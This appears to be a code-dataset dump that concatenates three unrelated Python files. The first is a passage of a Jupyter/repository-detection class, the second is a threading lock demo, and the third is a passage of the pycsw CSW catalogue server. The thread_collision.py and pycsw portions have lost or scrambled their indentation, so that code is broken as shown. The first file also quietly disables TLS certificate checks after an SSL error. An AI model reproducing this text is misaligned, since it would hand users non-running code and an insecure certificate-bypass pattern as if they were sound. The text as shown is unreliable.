                or len(sys.argv) < 3 or not sys.argv[2].endswith('.json'):
            return None

        # we can safely assume that we can import the notebook package here
        # noinspection PyBroadException
        try:
            from notebook.notebookapp import list_running_servers
            import requests
            current_kernel = sys.argv[2].split(os.path.sep)[-1].replace('kernel-', '').replace('.json', '')
            # initialize so a failed fallback scan below cannot leave this unbound
            server_info = None
            try:
                server_info = next(list_running_servers())
            except Exception:
                # on some jupyter notebook versions this function can crash on parsing the json file,
                # we will parse it manually here
                import ipykernel
                from glob import glob
                import json
                for f in glob(os.path.join(os.path.dirname(ipykernel.get_connection_file()), 'nbserver-*.json')):
                    # noinspection PyBroadException
                    try:
                        with open(f, 'r') as json_data:
                            server_info = json.load(json_data)
                    except Exception:  # was a bare except
                        server_info = None
                    if server_info:
                        break
            try:
                r = requests.get(
                    url=server_info['url'] + 'api/sessions',
                    headers={'Authorization': 'token {}'.format(server_info.get('token', '')), })
            except requests.exceptions.SSLError:
                # disable SSL check warning
                from urllib3.exceptions import InsecureRequestWarning
                requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
                # fire request
                r = requests.get(
                    url=server_info['url'] + 'api/sessions',
                    headers={'Authorization': 'token {}'.format(server_info.get('token', '')), }, verify=False)
                # enable SSL check warning
                import warnings
                warnings.simplefilter('default', InsecureRequestWarning)
            r.raise_for_status()
            notebooks = r.json()

            cur_notebook = None
            for n in notebooks:
                if n['kernel']['id'] == current_kernel:
                    cur_notebook = n
                    break

            notebook_path = cur_notebook['notebook'].get('path', '')
            notebook_name = cur_notebook['notebook'].get('name', '')

            is_google_colab = False
            # check if this is google.colab, then there is no local file
            # noinspection PyBroadException
            try:
                from IPython import get_ipython
                if get_ipython() and 'google.colab' in get_ipython().extension_manager.loaded:
                    is_google_colab = True
            except Exception:
                pass

            if is_google_colab:
                script_entry_point = notebook_name
                local_ipynb_file = None
            else:
                # always slash, because this is from uri (so never backslash not even on windows)
                entry_point_filename = notebook_path.split('/')[-1]

                # now we should try to find the actual file
                entry_point = (Path.cwd() / entry_point_filename).absolute()
                if not entry_point.is_file():
                    entry_point = (Path.cwd() / notebook_path).absolute()

                # get local ipynb for observer
                local_ipynb_file = entry_point.as_posix()

                # now replace the .ipynb with .py
                # we assume we will have that file available with the Jupyter notebook plugin
                entry_point = entry_point.with_suffix('.py')

                script_entry_point = entry_point.as_posix()

            # install the post store hook,
            # notice that if we do not have a local file we serialize/write every time the entire notebook
            cls._jupyter_install_post_store_hook(local_ipynb_file)

            return script_entry_point
        except Exception:
            return None

    @classmethod
    def _get_entry_point(cls, repo_root, script_path):
        """Return the script path relative to cwd (or repo root), posix-style."""
        repo_root = Path(repo_root).absolute()
        try:
            # Use os.path.relpath as it calculates up dir movements (../)
            entry_point = os.path.relpath(str(script_path), str(Path.cwd()))
        except ValueError:
            # Working directory not under repository root
            entry_point = script_path.relative_to(repo_root)
        return Path(entry_point).as_posix()

    @classmethod
    def _get_working_dir(cls, repo_root):
        """Return cwd relative to the repo root, or '.' when outside the repo."""
        repo_root = Path(repo_root).absolute()
        try:
            return Path.cwd().relative_to(repo_root).as_posix()
        except ValueError:
            # Working directory not under repository root
            return os.path.curdir

    @classmethod
    def _get_script_code(cls, script_path):
        """Best-effort read of the script's source text; '' on any failure."""
        # noinspection PyBroadException
        try:
            with open(script_path, 'r') as f:
                script_code = f.read()
            return script_code
        except Exception:
            pass
        return ''

    @classmethod
    def _get_script_info(cls, filepath, check_uncommitted=True, create_requirements=True, log=None):
        """Collect repository / entry point / diff / requirements for `filepath`.

        Returns ``(ScriptInfoResult, ScriptRequirements-or-None)``.
        Raises ScriptInfoError when the script file cannot be found.
        """
        jupyter_filepath = cls._get_jupyter_notebook_filename()
        if jupyter_filepath:
            script_path = Path(os.path.normpath(jupyter_filepath)).absolute()
        else:
            script_path = Path(os.path.normpath(filepath)).absolute()
            if not script_path.is_file():
                raise ScriptInfoError(
                    "Script file [{}] could not be found".format(filepath)
                )

        script_dir = script_path.parent

        def _log(msg, *args, **kwargs):
            # Warn through the caller-provided logger, if any.
            if not log:
                return
            log.warning(
                "Failed auto-detecting task repository: {}".format(
                    msg.format(*args, **kwargs)
                )
            )

        plugin = next((p for p in cls.plugins if p.exists(script_dir)), None)
        repo_info = DetectionResult()
        if not plugin:
            # bugfix: `log` may be None -- this was an unguarded log.info()
            if log:
                log.info("No repository found, storing script code instead")
        else:
            try:
                repo_info = plugin.get_info(str(script_dir), include_diff=check_uncommitted)
            except Exception as ex:
                _log("no info for {} ({})", script_dir, ex)
            else:
                if repo_info.is_empty():
                    _log("no info for {}", script_dir)

        repo_root = repo_info.root or script_dir
        if not plugin:
            working_dir = '.'
            entry_point = str(script_path.name)
        else:
            working_dir = cls._get_working_dir(repo_root)
            entry_point = cls._get_entry_point(repo_root, script_path)
        if check_uncommitted:
            # fall back to the raw script source when there is no commit to diff against
            diff = cls._get_script_code(script_path.as_posix()) \
                if not plugin or not repo_info.commit else repo_info.diff
        else:
            diff = ''
        # if this is not jupyter, get the requirements.txt
        requirements = ''
        conda_requirements = ''
        # create requirements if backend supports requirements
        # if jupyter is present, requirements will be created in the background, when saving a snapshot
        if not jupyter_filepath and Session.check_min_api_version('2.2'):
            script_requirements = ScriptRequirements(
                Path(repo_root).as_posix() if repo_info.url else script_path.as_posix())
            if create_requirements:
                requirements, conda_requirements = script_requirements.get_requirements()
        else:
            script_requirements = None

        script_info = dict(
            repository=furl(repo_info.url).remove(username=True, password=True).tostr(),
            branch=repo_info.branch,
            version_num=repo_info.commit,
            entry_point=entry_point,
            working_dir=working_dir,
            diff=diff,
            requirements={'pip': requirements, 'conda': conda_requirements} if requirements else None,
            binary='python{}.{}'.format(sys.version_info.major, sys.version_info.minor),
        )

        messages = []
        if repo_info.modified:
            messages.append(
                "======> WARNING! UNCOMMITTED CHANGES IN REPOSITORY {} <======".format(
                    script_info.get("repository", "")
                )
            )

        if not any(script_info.values()):
            script_info = None

        return (ScriptInfoResult(script=script_info, warning_messages=messages),
                script_requirements)

    @classmethod
    def get(cls, filepath=sys.argv[0], check_uncommitted=True, create_requirements=True, log=None):
        """Safe wrapper around _get_script_info: never raises, warns via `log`."""
        try:
            return cls._get_script_info(
                filepath=filepath, check_uncommitted=check_uncommitted,
                create_requirements=create_requirements, log=log)
        except Exception as ex:
            if log:
                log.warning("Failed auto-detecting task repository: {}".format(ex))
        return ScriptInfoResult(), None

    @classmethod
    def close(cls):
        """Shut down the Jupyter notebook observer thread, if running."""
        _JupyterObserver.close()
# Result container returned by ScriptInfo.get()/._get_script_info().
@attr.s
class ScriptInfoResult(object):
    # Detected script/repository fields (dict), or None when nothing was detected.
    script = attr.ib(default=None)
    # Human-readable warnings gathered during detection (e.g. uncommitted changes).
    warning_messages = attr.ib(factory=list)
|
thread_collision.py | '''
multi-threading (python3 version)
https://docs.python.org/3/library/threading.html
'''
from time import clock
import threading
THREADS=2
lock = threading.Lock()
A = 0
B = 0
C = 0
def test_globals():
global A, B, C
for i in range(1024*1024):
lock.acquire()
A += 1
B += 2
C = A + B
lock.release()
def main():
print( 'starting threading test')
starttime = clock()
threads = []
for i in range(THREADS):
t = threading.Thread( target=test_globals, args=() )
t.start()
threads.append( t )
for t in threads:
t.join()
print( clock()-starttime)
print('A:', A)
print('B:', B)
print('C:', C)
main() |
server.py | # -*- coding: utf-8 -*-
# =================================================================
#
# Authors: Tom Kralidis <tomkralidis@gmail.com>
# Angelos Tzotsos <tzotsos@gmail.com>
#
# Copyright (c) 2016 Tom Kralidis
# Copyright (c) 2015 Angelos Tzotsos
# Copyright (c) 2016 James Dickens
# Copyright (c) 2016 Ricardo Silva
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import logging
import os
from six.moves.urllib.parse import parse_qsl
from six.moves.urllib.parse import splitquery
from six.moves.urllib.parse import urlparse
from six import StringIO
from six.moves.configparser import SafeConfigParser
import sys
from time import time
import wsgiref.util
from pycsw.core.etree import etree
from pycsw import oaipmh, opensearch, sru
from pycsw.plugins.profiles import profile as pprofile
import pycsw.plugins.outputschemas
from pycsw.core import config, log, util
from pycsw.ogc.csw import csw2, csw3
LOGGER = logging.getLogger(__name__)
class Csw(object):
""" Base CSW server """
def __init__(self, rtconfig=None, env=None, version='3.0.0'):
    """ Initialize CSW

    :param rtconfig: runtime configuration -- an already-parsed
        SafeConfigParser, a dict of {section: {option: value}}, or a path
        to a configuration file
    :param env: WSGI-style environ mapping (defaults to os.environ)
    :param version: requested CSW protocol version, '2.0.2' or '3.0.0'

    On configuration failure, sets self.response to an ExceptionReport
    and returns early (dispatch_wsgi checks for a pre-built response).
    """
    if not env:
        self.environ = os.environ
    else:
        self.environ = env

    self.context = config.StaticContext()

    # Lazy load this when needed
    # (it will permanently update global cfg namespaces)
    self.sruobj = None
    self.opensearchobj = None
    self.oaipmhobj = None

    # init kvp
    self.kvp = {}

    self.mode = 'csw'
    self.asyncron = False
    self.soap = False
    self.request = None
    self.exception = False
    self.status = 'OK'
    self.profiles = None
    self.manager = False
    self.outputschemas = {}
    self.mimetype = 'application/xml; charset=UTF-8'
    self.encoding = 'UTF-8'
    self.pretty_print = 0
    self.domainquerytype = 'list'
    self.orm = 'django'
    self.language = {'639_code': 'en', 'text': 'english'}
    self.process_time_start = time()

    # define CSW implementation object (default CSW3)
    self.iface = csw3.Csw3(server_csw=self)
    self.request_version = version

    if self.request_version == '2.0.2':
        self.iface = csw2.Csw2(server_csw=self)
        self.context.set_model('csw')

    # load user configuration
    try:
        LOGGER.info('Loading user configuration')
        # NOTE(review): SafeConfigParser is deprecated on py3 -- kept as-is
        if isinstance(rtconfig, SafeConfigParser):  # serialized already
            self.config = rtconfig
        else:
            self.config = SafeConfigParser()
            if isinstance(rtconfig, dict):  # dictionary
                for section, options in rtconfig.items():
                    self.config.add_section(section)
                    for k, v in options.items():
                        self.config.set(section, k, v)
            else:  # configuration file
                import codecs
                with codecs.open(rtconfig, encoding='utf-8') as scp:
                    self.config.readfp(scp)
    except Exception as err:
        msg = 'Could not load configuration'
        LOGGER.exception('%s %s: %s', msg, rtconfig, err)
        self.response = self.iface.exceptionreport(
            'NoApplicableCode', 'service', msg)
        return

    # set server.home safely
    # TODO: make this more abstract
    self.config.set(
        'server', 'home',
        os.path.dirname(os.path.join(os.path.dirname(__file__), '..'))
    )
    self.context.pycsw_home = self.config.get('server', 'home')
    self.context.url = self.config.get('server', 'url')

    log.setup_logger(self.config)

    LOGGER.info('running configuration %s', rtconfig)
    LOGGER.debug('QUERY_STRING: %s', self.environ['QUERY_STRING'])

    # set OGC schemas location
    if not self.config.has_option('server', 'ogc_schemas_base'):
        self.config.set('server', 'ogc_schemas_base',
                        self.context.ogc_schemas_base)

    # set mimetype
    if self.config.has_option('server', 'mimetype'):
        # NOTE(review): encode() makes this bytes while the default above is
        # str -- confirm the downstream header writer expects bytes
        self.mimetype = self.config.get('server', 'mimetype').encode()

    # set encoding
    if self.config.has_option('server', 'encoding'):
        self.encoding = self.config.get('server', 'encoding')

    # set domainquerytype
    if self.config.has_option('server', 'domainquerytype'):
        self.domainquerytype = self.config.get('server', 'domainquerytype')

    # set XML pretty print
    if (self.config.has_option('server', 'pretty_print') and
            self.config.get('server', 'pretty_print') == 'true'):
        self.pretty_print = 1

    # set Spatial Ranking option
    if (self.config.has_option('server', 'spatial_ranking') and
            self.config.get('server', 'spatial_ranking') == 'true'):
        util.ranking_enabled = True

    # set language default
    if self.config.has_option('server', 'language'):
        try:
            LOGGER.info('Setting language')
            lang_code = self.config.get('server', 'language').split('-')[0]
            self.language['639_code'] = lang_code
            self.language['text'] = self.context.languages[lang_code]
        except Exception as err:
            # unknown language codes are non-fatal; keep the defaults
            LOGGER.exception('Could not set language: %s', err)
            pass

    LOGGER.debug('Configuration: %s.', self.config)
    LOGGER.debug('Model: %s.', self.context.model)

    # load user-defined mappings if they exist
    if self.config.has_option('repository', 'mappings'):
        # override default repository mappings
        try:
            import imp
            module = self.config.get('repository', 'mappings')
            if '/' in module:  # filepath
                modulename = '%s' % os.path.splitext(module)[0].replace(
                    os.sep, '.')
                mappings = imp.load_source(modulename, module)
            else:  # dotted name
                mappings = __import__(module, fromlist=[''])
            LOGGER.info('Loading custom repository mappings '
                        'from %s', module)
            self.context.md_core_model = mappings.MD_CORE_MODEL
            self.context.refresh_dc(mappings.MD_CORE_MODEL)
        except Exception as err:
            LOGGER.exception('Could not load custom mappings: %s', err)
            self.response = self.iface.exceptionreport(
                'NoApplicableCode', 'service',
                'Could not load repository.mappings')

    # load outputschemas
    LOGGER.info('Loading outputschemas')

    for osch in pycsw.plugins.outputschemas.__all__:
        output_schema_module = __import__(
            'pycsw.plugins.outputschemas.%s' % osch)
        mod = getattr(output_schema_module.plugins.outputschemas, osch)
        self.outputschemas[mod.NAMESPACE] = mod

    LOGGER.debug('Outputschemas loaded: %s.', self.outputschemas)
    LOGGER.debug('Namespaces: %s', self.context.namespaces)
def expand_path(self, path):
    """Resolve a relative path against the WSGI app root, if one is set."""
    if os.path.isabs(path) or 'local.app_root' not in self.environ:
        return path
    return os.path.join(self.environ['local.app_root'], path)
def dispatch_wsgi(self):
    """ WSGI handler

    Reads the request from self.environ (POST body or GET query string),
    populates self.request / self.requesttype / self.kvp, then delegates
    to dispatch(). If __init__ already built an error response, returns it
    immediately.
    """
    if hasattr(self, 'response'):
        return self._write_response()

    LOGGER.debug('WSGI mode detected')

    if self.environ['REQUEST_METHOD'] == 'POST':
        try:
            request_body_size = int(self.environ.get('CONTENT_LENGTH', 0))
        except ValueError:
            request_body_size = 0

        self.requesttype = 'POST'
        self.request = self.environ['wsgi.input'].read(request_body_size)
        LOGGER.debug('Request type: POST. Request:\n%s...\n', self.request[:100])
    else:  # it's a GET request
        self.requesttype = 'GET'
        self.request = wsgiref.util.request_uri(self.environ)
        try:
            # urlparse().query replaces splitquery(), which was removed
            # from urllib.parse in Python 3.10
            query_part = urlparse(self.request).query
            self.kvp = dict(parse_qsl(query_part, keep_blank_values=True))
        except AttributeError:
            LOGGER.exception('Could not parse query string')
            self.kvp = {}
        LOGGER.debug('Request type: GET. Request:\n%s...\n', self.request[:100])

    return self.dispatch()
def opensearch(self):
    """Lazily build and return the shared OpenSearch helper."""
    if self.opensearchobj:
        return self.opensearchobj
    self.opensearchobj = opensearch.OpenSearch(self.context)
    return self.opensearchobj
def sru(self):
    """Lazily build and return the shared SRU helper."""
    if self.sruobj:
        return self.sruobj
    self.sruobj = sru.Sru(self.context)
    return self.sruobj
def oaipmh(self):
    """Lazily build and return the shared OAI-PMH helper."""
    if self.oaipmhobj:
        return self.oaipmhobj
    self.oaipmhobj = oaipmh.OAIPMH(self.context, self.config)
    return self.oaipmhobj
def dispatch(self, writer=sys.stdout, write_headers=True):
    """ Handle incoming HTTP request

    Pipeline: normalize KVP / sniff POST payload version, translate
    SRU / OAI-PMH requests into CSW KVP, load the repository, validate
    the basic service/version/request parameters, route to the matching
    operation handler, and finally re-encode the response for
    SRU / OpenSearch / OAI-PMH modes.

    `writer` and `write_headers` are unused in this body -- presumably
    legacy parameters kept for callers; confirm before removing.
    """
    # error=1 plus code/locator/text drives the ExceptionReport below
    error = 0

    if self.requesttype == 'GET':
        self.kvp = self.normalize_kvp(self.kvp)
        version_202 = ('version' in self.kvp and
                       self.kvp['version'] == '2.0.2')
        accept_version_202 = ('acceptversions' in self.kvp and
                              '2.0.2' in self.kvp['acceptversions'])
        if version_202 or accept_version_202:
            self.request_version = '2.0.2'
    elif self.requesttype == 'POST':
        # sniff the raw XML payload for the namespace version
        if self.request.find(b'cat/csw/2.0.2') != -1:
            self.request_version = '2.0.2'
        elif self.request.find(b'cat/csw/3.0') != -1:
            self.request_version = '3.0.0'

    # SRU requests are translated into CSW 2.0.2 KVP
    if (not isinstance(self.kvp, str) and 'mode' in self.kvp and
            self.kvp['mode'] == 'sru'):
        self.mode = 'sru'
        self.request_version = '2.0.2'
        LOGGER.info('SRU mode detected; processing request')
        self.kvp = self.sru().request_sru2csw(self.kvp)

    # OAI-PMH requests likewise map onto CSW 2.0.2
    if (not isinstance(self.kvp, str) and 'mode' in self.kvp and
            self.kvp['mode'] == 'oaipmh'):
        self.mode = 'oaipmh'
        self.request_version = '2.0.2'
        LOGGER.info('OAI-PMH mode detected; processing request.')
        self.oaiargs = dict((k, v) for k, v in self.kvp.items() if k)
        self.kvp = self.oaipmh().request(self.kvp)

    if self.request_version == '2.0.2':
        self.iface = csw2.Csw2(server_csw=self)
        self.context.set_model('csw')

    # configure transaction support, if specified in config
    self._gen_manager()

    namespaces = self.context.namespaces
    ops = self.context.model['operations']
    constraints = self.context.model['constraints']

    # generate domain model
    # NOTE: We should probably avoid this sort of mutable state for WSGI
    if 'GetDomain' not in ops:
        ops['GetDomain'] = self.context.gen_domains()

    # generate distributed search model, if specified in config
    if self.config.has_option('server', 'federatedcatalogues'):
        LOGGER.info('Configuring distributed search')

        constraints['FederatedCatalogues'] = {'values': []}

        for fedcat in self.config.get('server',
                                      'federatedcatalogues').split(','):
            LOGGER.debug('federated catalogue: %s', fedcat)
            constraints['FederatedCatalogues']['values'].append(fedcat)

    # advertise each loaded output schema on the relevant operations
    for key, value in self.outputschemas.items():
        get_records_params = ops['GetRecords']['parameters']
        get_records_params['outputSchema']['values'].append(
            value.NAMESPACE)
        get_records_by_id_params = ops['GetRecordById']['parameters']
        get_records_by_id_params['outputSchema']['values'].append(
            value.NAMESPACE)
        if 'Harvest' in ops:
            harvest_params = ops['Harvest']['parameters']
            harvest_params['ResourceType']['values'].append(
                value.NAMESPACE)

    LOGGER.info('Setting MaxRecordDefault')
    if self.config.has_option('server', 'maxrecords'):
        constraints['MaxRecordDefault']['values'] = [
            self.config.get('server', 'maxrecords')]

    # load profiles
    if self.config.has_option('server', 'profiles'):
        self.profiles = pprofile.load_profiles(
            os.path.join('pycsw', 'plugins', 'profiles'),
            pprofile.Profile,
            self.config.get('server', 'profiles')
        )

        for prof in self.profiles['plugins'].keys():
            tmp = self.profiles['plugins'][prof](self.context.model,
                                                 namespaces,
                                                 self.context)
            key = tmp.outputschema  # to ref by outputschema
            self.profiles['loaded'][key] = tmp
            self.profiles['loaded'][key].extend_core(self.context.model,
                                                     namespaces,
                                                     self.config)

        LOGGER.debug('Profiles loaded: %s' % list(self.profiles['loaded'].keys()))

    # init repository
    # look for tablename, set 'records' as default
    if not self.config.has_option('repository', 'table'):
        self.config.set('repository', 'table', 'records')

    repo_filter = None
    if self.config.has_option('repository', 'filter'):
        repo_filter = self.config.get('repository', 'filter')

    if self.config.has_option('repository', 'source'):  # load custom repository
        rs = self.config.get('repository', 'source')
        rs_modname, rs_clsname = rs.rsplit('.', 1)

        rs_mod = __import__(rs_modname, globals(), locals(), [rs_clsname])
        rs_cls = getattr(rs_mod, rs_clsname)

        try:
            self.repository = rs_cls(self.context, repo_filter)
            LOGGER.debug('Custom repository %s loaded (%s)', rs, self.repository.dbtype)
        except Exception as err:
            msg = 'Could not load custom repository %s: %s' % (rs, err)
            LOGGER.exception(msg)
            error = 1
            code = 'NoApplicableCode'
            locator = 'service'
            text = 'Could not initialize repository. Check server logs'
    else:  # load default repository
        self.orm = 'sqlalchemy'
        from pycsw.core import repository
        try:
            LOGGER.info('Loading default repository')
            self.repository = repository.Repository(
                self.config.get('repository', 'database'),
                self.context,
                self.environ.get('local.app_root', None),
                self.config.get('repository', 'table'),
                repo_filter
            )
            LOGGER.debug(
                'Repository loaded (local): %s.' % self.repository.dbtype)
        except Exception as err:
            msg = 'Could not load repository (local): %s' % err
            LOGGER.exception(msg)
            error = 1
            code = 'NoApplicableCode'
            locator = 'service'
            text = 'Could not initialize repository. Check server logs'

    if self.requesttype == 'POST':
        LOGGER.debug('HTTP POST request')
        LOGGER.debug('CSW version: %s', self.iface.version)
        self.kvp = self.iface.parse_postdata(self.request)
        # parse_postdata returns an error string on failure
        if isinstance(self.kvp, str):  # it's an exception
            error = 1
            locator = 'service'
            text = self.kvp
            if (self.kvp.find('the document is not valid') != -1 or
                    self.kvp.find('document not well-formed') != -1):
                code = 'NoApplicableCode'
            else:
                code = 'InvalidParameterValue'

    LOGGER.debug('HTTP Headers:\n%s.', self.environ)
    LOGGER.debug('Parsed request parameters: %s', self.kvp)

    if (not isinstance(self.kvp, str) and 'mode' in self.kvp and
            self.kvp['mode'] == 'opensearch'):
        self.mode = 'opensearch'
        LOGGER.info('OpenSearch mode detected; processing request.')
        self.kvp['outputschema'] = 'http://www.w3.org/2005/Atom'

    # bare base-URL request: default to csw30 GetCapabilities
    if ((len(self.kvp) == 0 and self.request_version == '3.0.0') or
            (len(self.kvp) == 1 and 'config' in self.kvp)):
        LOGGER.info('Turning on default csw30:Capabilities for base URL')
        self.kvp = {
            'service': 'CSW',
            'acceptversions': '3.0.0',
            'request': 'GetCapabilities'
        }
        http_accept = self.environ.get('HTTP_ACCEPT', '')
        if 'application/opensearchdescription+xml' in http_accept:
            self.mode = 'opensearch'
            self.kvp['outputschema'] = 'http://www.w3.org/2005/Atom'

    if error == 0:
        # test for the basic keyword values (service, version, request)
        basic_options = ['service', 'request']
        request = self.kvp.get('request', '')
        own_version_integer = util.get_version_integer(
            self.request_version)
        if self.request_version == '2.0.2':
            basic_options.append('version')
        if self.request_version == '3.0.0' and 'version' not in self.kvp and self.requesttype == 'POST':
            if 'service' not in self.kvp:
                self.kvp['service'] = 'CSW'
                basic_options.append('service')
            self.kvp['version'] = self.request_version
            basic_options.append('version')
        for k in basic_options:
            if k not in self.kvp:
                if (k in ['version', 'acceptversions'] and
                        request == 'GetCapabilities'):
                    pass
                else:
                    error = 1
                    locator = k
                    code = 'MissingParameterValue'
                    text = 'Missing keyword: %s' % k
                    break

        # test each of the basic keyword values
        if error == 0:
            # test service
            if self.kvp['service'] != 'CSW':
                error = 1
                locator = 'service'
                code = 'InvalidParameterValue'
                text = 'Invalid value for service: %s.\
                Value MUST be CSW' % self.kvp['service']

            # test version
            kvp_version = self.kvp.get('version', '')
            try:
                kvp_version_integer = util.get_version_integer(kvp_version)
            except Exception as err:
                kvp_version_integer = 'invalid_value'
            if (request != 'GetCapabilities' and
                    kvp_version_integer != own_version_integer):
                error = 1
                locator = 'version'
                code = 'InvalidParameterValue'
                text = ('Invalid value for version: %s. Value MUST be '
                        '2.0.2 or 3.0.0' % kvp_version)

            # check for GetCapabilities acceptversions
            if 'acceptversions' in self.kvp:
                for vers in self.kvp['acceptversions'].split(','):
                    vers_integer = util.get_version_integer(vers)
                    if vers_integer == own_version_integer:
                        break
                    else:
                        error = 1
                        locator = 'acceptversions'
                        code = 'VersionNegotiationFailed'
                        text = ('Invalid parameter value in '
                                'acceptversions: %s. Value MUST be '
                                '2.0.2 or 3.0.0' %
                                self.kvp['acceptversions'])

            # test request
            if self.kvp['request'] not in \
                    self.context.model['operations']:
                error = 1
                locator = 'request'
                if request in ['Transaction', 'Harvest']:
                    code = 'OperationNotSupported'
                    text = '%s operations are not supported' % request
                else:
                    code = 'InvalidParameterValue'
                    text = 'Invalid value for request: %s' % request

    if error == 1:  # return an ExceptionReport
        LOGGER.error('basic service options error: %s, %s, %s', code, locator, text)
        self.response = self.iface.exceptionreport(code, locator, text)

    else:  # process per the request value
        if 'responsehandler' in self.kvp:
            # set flag to process asynchronously
            import threading
            self.asyncron = True
            request_id = self.kvp.get('requestid', None)
            if request_id is None:
                import uuid
                self.kvp['requestid'] = str(uuid.uuid4())

        if self.kvp['request'] == 'GetCapabilities':
            self.response = self.iface.getcapabilities()
        elif self.kvp['request'] == 'DescribeRecord':
            self.response = self.iface.describerecord()
        elif self.kvp['request'] == 'GetDomain':
            self.response = self.iface.getdomain()
        elif self.kvp['request'] == 'GetRecords':
            if self.asyncron:  # process asynchronously
                threading.Thread(target=self.iface.getrecords).start()
                self.response = self.iface._write_acknowledgement()
            else:
                self.response = self.iface.getrecords()
        elif self.kvp['request'] == 'GetRecordById':
            self.response = self.iface.getrecordbyid()
        elif self.kvp['request'] == 'GetRepositoryItem':
            self.response = self.iface.getrepositoryitem()
        elif self.kvp['request'] == 'Transaction':
            self.response = self.iface.transaction()
        elif self.kvp['request'] == 'Harvest':
            if self.asyncron:  # process asynchronously
                threading.Thread(target=self.iface.harvest).start()
                self.response = self.iface._write_acknowledgement()
            else:
                self.response = self.iface.harvest()
        else:
            self.response = self.iface.exceptionreport(
                'InvalidParameterValue', 'request',
                'Invalid request parameter: %s' % self.kvp['request']
            )
        LOGGER.info('Request processed')

    # re-encode the CSW response for the alternate front-end modes
    if self.mode == 'sru':
        LOGGER.info('SRU mode detected; processing response.')
        self.response = self.sru().response_csw2sru(self.response,
                                                    self.environ)
    elif self.mode == 'opensearch':
        LOGGER.info('OpenSearch mode detected; processing response.')
        self.response = self.opensearch().response_csw2opensearch(
            self.response, self.config)

    elif self.mode == 'oaipmh':
        LOGGER.info('OAI-PMH mode detected; processing response.')
        self.response = self.oaipmh().response(
            self.response, self.oaiargs, self.repository,
            self.config.get('server', 'url')
        )

    return self._write_response()
def getcapabilities(self):
    """ Handle GetCapabilities request by delegating to the version-specific interface object """
    return self.iface.getcapabilities()
def describerecord(self):
    """ Handle DescribeRecord request (delegates to self.iface) """
    return self.iface.describerecord()
def getdomain(self):
    """ Handle GetDomain request (delegates to self.iface) """
    return self.iface.getdomain()
def getrecords(self):
    """ Handle GetRecords request (delegates to self.iface) """
    return self.iface.getrecords()
def getrecordbyid(self, raw=False):
    """ Handle GetRecordById request (delegates to self.iface)

    :param raw: when True, ask the interface for the raw record representation
    """
    return self.iface.getrecordbyid(raw)
def getrepositoryitem(self):
    """ Handle GetRepositoryItem request (delegates to self.iface) """
    return self.iface.getrepositoryitem()
def transaction(self):
    """ Handle Transaction request (delegates to self.iface) """
    return self.iface.transaction()
def harvest(self):
    """ Handle Harvest request (delegates to self.iface) """
    return self.iface.harvest()
def _write_response(self):
    """ Generate response

    Serializes self.response (an lxml Element), wrapping it in a SOAP
    envelope when requested, converting to JSON when outputformat asks for
    it, and otherwise prepending an XML declaration plus a pycsw version
    comment.  Returns [HTTP status line, encoded payload bytes].
    """
    # set HTTP response headers and XML declaration
    xmldecl = ''
    appinfo = ''
    LOGGER.info('Writing response.')
    if hasattr(self, 'soap') and self.soap:
        # replace self.response with a soapenv:Envelope around the payload
        self._gen_soap_wrapper()
    # NOTE(review): lexicographic string comparison of version numbers is
    # fragile (e.g. '10.0' < '3.5.0'); confirm the supported lxml range.
    if etree.__version__ >= '3.5.0':  # remove superfluous namespaces
        etree.cleanup_namespaces(self.response,
                                 keep_ns_prefixes=self.context.keep_ns_prefixes)
    response = etree.tostring(self.response,
                              pretty_print=self.pretty_print,
                              encoding='unicode')
    if (isinstance(self.kvp, dict) and 'outputformat' in self.kvp and
            self.kvp['outputformat'] == 'application/json'):
        # JSON requested: convert the already-serialized XML
        self.contenttype = self.kvp['outputformat']
        from pycsw.core.formats import fmt_json
        response = fmt_json.xml2json(response,
                                     self.context.namespaces,
                                     self.pretty_print)
    else:  # it's XML
        if 'outputformat' in self.kvp:
            self.contenttype = self.kvp['outputformat']
        else:
            self.contenttype = self.mimetype
        xmldecl = ('<?xml version="1.0" encoding="%s" standalone="no"?>'
                   '\n' % self.encoding)
        appinfo = '<!-- pycsw %s -->\n' % self.context.version
    if isinstance(self.contenttype, bytes):
        # normalize to str so the value is usable as an HTTP header
        self.contenttype = self.contenttype.decode()
    s = (u'%s%s%s' % (xmldecl, appinfo, response)).encode(self.encoding)
    LOGGER.debug('Response code: %s',
                 self.context.response_codes[self.status])
    LOGGER.debug('Response:\n%s', s)
    return [self.context.response_codes[self.status], s]
def _gen_soap_wrapper(self):
    """ Generate SOAP wrapper

    Replaces self.response with a soapenv:Envelope whose Body contains
    either the original payload or, when self.exception is set, a
    soapenv:Fault carrying the payload under its Detail element.
    """
    LOGGER.info('Writing SOAP wrapper.')
    node = etree.Element(
        util.nspath_eval('soapenv:Envelope', self.context.namespaces),
        nsmap=self.context.namespaces
    )
    schema_location_ns = util.nspath_eval('xsi:schemaLocation',
                                          self.context.namespaces)
    # NOTE(review): both halves of xsi:schemaLocation are the soapenv
    # namespace URI; the second value is conventionally the XSD document
    # location -- confirm this duplication is intentional.
    node.attrib[schema_location_ns] = '%s %s' % (
        self.context.namespaces['soapenv'],
        self.context.namespaces['soapenv']
    )
    node2 = etree.SubElement(
        node, util.nspath_eval('soapenv:Body', self.context.namespaces))
    if self.exception:
        # Fault path: Code/Value, Reason/Text, then the report under Detail
        node3 = etree.SubElement(
            node2,
            util.nspath_eval('soapenv:Fault', self.context.namespaces)
        )
        node4 = etree.SubElement(
            node3,
            util.nspath_eval('soapenv:Code', self.context.namespaces)
        )
        etree.SubElement(
            node4,
            util.nspath_eval('soapenv:Value', self.context.namespaces)
        ).text = 'soap:Server'
